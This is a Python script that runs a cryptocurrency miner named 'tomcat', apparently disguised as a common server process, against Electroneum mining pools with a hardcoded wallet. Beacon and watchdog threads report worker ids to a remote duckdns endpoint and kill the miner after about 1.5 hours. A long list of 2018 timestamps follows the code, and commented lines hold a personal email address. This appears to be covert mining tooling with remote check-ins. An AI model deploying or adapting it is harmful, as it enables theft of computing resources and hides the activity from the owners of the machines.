import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:53:01.757928
#2018-02-17 16:37:03.987016
#2018-02-17 18:24:05.956115
#2018-02-17 20:12:06.894244
#2018-02-17 21:59:04.284172
#2018-02-17 23:43:06.895285
#2018-02-18 01:33:01.517794
#2018-02-18 03:19:01.427743
#2018-02-18 05:07:07.064781
#2018-02-18 07:00:10.526857
#2018-02-18 08:49:03.967593
#2018-02-18 10:35:07.431553
#2018-02-18 12:20:03.695432
#2018-02-18 14:07:05.297737
#2018-02-18 15:57:05.133840
#2018-02-18 17:47:06.966706
#2018-02-18 19:33:06.678628
#2018-02-18 21:18:06.458141
#2018-02-18 23:06:05.298222
#2018-02-19 00:53:06.191186
#2018-02-19 02:40:04.384138
#2018-02-19 04:26:07.630928
#2018-02-19 06:11:07.171272
#2018-02-19 07:58:05.809940
#2018-02-19 09:49:07.160574
#2018-02-19 11:37:07.232863
#2018-02-19 13:24:04.018473
#2018-02-19 15:12:03.893790
#2018-02-19 17:02:08.009194
#2018-02-19 18:50:01.614525
#2018-02-19 20:36:07.427088
#2018-02-19 22:24:01.388983
#2018-02-20 00:10:05.183412
#2018-02-20 01:56:03.662836
#2018-02-20 03:46:01.920079
#2018-02-20 05:30:04.974699
#2018-02-20 07:14:01.594051
#2018-02-20 09:01:05.630157
#2018-02-20 10:44:01.507687
#2018-02-20 12:31:10.462750
#2018-02-20 14:17:05.740452
#2018-02-20 16:00:10.251721
#2018-02-20 17:47:06.992373
#2018-02-20 19:39:08.326152
#2018-02-20 21:28:01.579876
#2018-02-20 23:11:02.124722
#2018-02-21 00:54:05.216774
#2018-02-21 02:39:07.925998
#2018-02-21 04:27:06.494523
#2018-02-21 06:15:07.741232
#2018-02-21 08:00:12.651497
#2018-02-21 09:46:11.004411
#2018-02-21 11:34:09.945513
#2018-02-21 13:24:07.906706
#2018-02-21 15:09:06.064644
#2018-02-21 16:58:09.490797
#2018-02-21 18:46:11.634131
#2018-02-21 20:37:02.265013
#2018-02-21 22:23:07.128795
#2018-02-22 00:13:01.747281
#2018-02-22 01:59:05.138596
#2018-02-22 03:45:07.018407
#2018-02-22 05:32:04.587445
#2018-02-22 07:17:06.746058
#2018-02-22 09:04:06.112656
#2018-02-22 10:51:05.030132
#2018-02-22 12:37:01.696990
#2018-02-22 14:22:06.723827
#2018-02-22 16:09:08.056845
#2018-02-22 17:56:09.388004
#2018-02-22 19:44:10.597361
#2018-02-22 21:34:06.883519
#2018-02-22 23:21:08.168950
#2018-02-23 01:09:08.680342
#2018-02-23 02:57:01.363360
#2018-02-23 04:43:06.088353
#2018-02-23 06:28:07.395261
#2018-02-23 08:14:07.201637
#2018-02-23 10:31:06.789156
#2018-02-23 12:23:03.957576
#2018-02-23 14:12:04.138029
#2018-02-23 16:02:05.254092
#2018-02-23 17:49:08.479660
#2018-02-23 19:36:03.846417
#2018-02-23 21:18:06.850402
#2018-02-23 23:06:05.697875
#2018-02-24 00:50:01.543769
#2018-02-24 02:41:08.059611
#2018-02-24 04:36:04.843026
#2018-02-24 06:20:04.189965
#2018-02-24 08:07:06.126381
#2018-02-24 09:53:01.985118
#2018-02-24 11:47:03.738541
#2018-02-24 13:38:05.949963
#2018-02-24 15:25:06.663826
#2018-02-24 17:14:07.292680
#2018-02-24 19:06:01.290035
#2018-02-24 20:55:02.118521
#2018-02-24 23:20:07.457764
#2018-02-25 02:44:07.236136
#2018-02-25 06:32:07.001534